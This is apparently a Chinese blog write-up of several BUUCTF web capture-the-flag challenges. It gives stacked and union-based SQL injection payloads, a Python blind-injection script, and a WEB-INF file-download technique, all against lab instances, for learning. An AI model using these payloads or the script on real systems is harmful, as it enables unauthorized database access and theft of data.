BUUCTF-WEB(31-35)

[GYCTF2020]Blacklist

参考：
[GYCTF2020]Blacklist 1详解（handler下令用法!)-CSDN博客
SQL注入一些过滤及绕过总结_sql注入过滤-CSDN博客
过滤了这些内容。包括大写，由于是正则匹配，无法双写绕过
这里其实我又试了试注释符绕过，但是没有任何回显

但是我发现可以堆叠注入,因为这道题的框我前面见过，那道题的升级版
爆数据库

1. 1';show database;#

复制代码

爆表

1. 1';show tables;#

复制代码

爆列：

1. 1';show columns from FlagHere;#

复制代码

看了wp，学到了handler这个下令

1. 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;

复制代码

[CISCN2019 华北赛区 Day2 Web1]Hack World

参考：
[BUUCTF：CISCN2019 华北赛区 Day2 Web1]Hack World-CSDN博客
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解-阿里云开发者社区 (aliyun.com)
表还有字段都有了，然后盲注
大佬的脚本：

1. # -*- coding:utf-8 -*-
2. # Author: mochu7
3. import requests
4. import string
6. def blind_injection(url):
7.         flag = ''
8.         strings = string.printable
9.         for num in range(1,60):
10.                 for i in strings:
11.                         payload = '(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num,ord(i))
12.                         post_data = {"id":payload}
13.                         res = requests.post(url=url,data=post_data)
14.                         if 'Hello' in res.text:
15.                                 flag += i
16.                                 print(flag)
17.                         else:
18.                                 continue
19.         print(flag)
22. if __name__ == '__main__':
23.         url = 'http://6536f1ec-e085-4588-bc35-c00a2ac6b093.node5.buuoj.cn:81/index.php'
24.         blind_injection(url)

复制代码

这边跑出来了，交flag对不了，也挺奇怪
[RoarCTF 2019]Easy Java

参考：
[刷题RoarCTF 2019]Easy Java - kar3a - 博客园 (cnblogs.com)
[（详解）RoarCTF 2019]Easy Java-CSDN博客
[RoarCTF 2019]Easy Java - 春告鳥 - 博客园 (cnblogs.com)
我对java这个网站不太了解，所以也是直接看师傅们的博客了
这里也是打开help这个链接，之后发现可能有下载的毛病

但是是下载不了的，我们改成POST请求就可以成功发送请求，下载文件
下载了help.docx是没有flag的

翻了师傅们的博客，知道

1. WEB-INF主要包含一下文件或目录：
2.     /WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。
3.     /WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中
4.     /WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
5.     /WEB-INF/src/：源码目录，按照包名结构放置各个java文件。
6.     /WEB-INF/database.properties：数据库配置文件
7. 漏洞检测以及利用方法：通过找到web.xml文件，推断class文件的路径，最后直接class文件，在通过反编译class文件，得到网站源码

复制代码

那我们POST发送

1. filename=/WEB-INF/web.xml

复制代码

下载后也是发现了关键信息

然后下载

1. filename=/WEB-INF/classes/com/wm/ctf/FlagController.class

复制代码

给代码里面的base64解密得到flag

[网鼎杯 2018]Fakebook

参考：
[BUUCTF：网鼎杯 2018]Fakebook_fakebook buuctf-CSDN博客
[buuctf-网鼎杯 2018]Fakebook 1 - junlebao - 博客园 (cnblogs.com)
目次扫描，找到了robots.txt，flag.php

访问了一下，什么没有
但是我看wp这里都说是user.php.bak
我们下载下来发现是个反序列化

注册账号后发现有个no参数，我们尝试注入一下

输入1',根据报错应该是数字型的

爆字段数，一共有四个

1. 1 order by 5

复制代码

爆回显位置，然后union select被过滤了，我们用注释绕过

1. -1 union/**/select 1,2,3,4

复制代码

剩下就是正常注入

1. -1 union/**/select 1,database(),3,4  // 爆库
2. -1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where  table_schema='fakebook'  // 爆表
3. -1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where  table_schema='fakebook' and table_name='users' // 爆列
4. -1 union/**/select 1,group_concat(username,'-',passwd,'-',data),3,4 from fakebook.users // 爆数据

复制代码

我们发现这个data这个数据就是序列化的内容，我们再看一下那个文件
[code]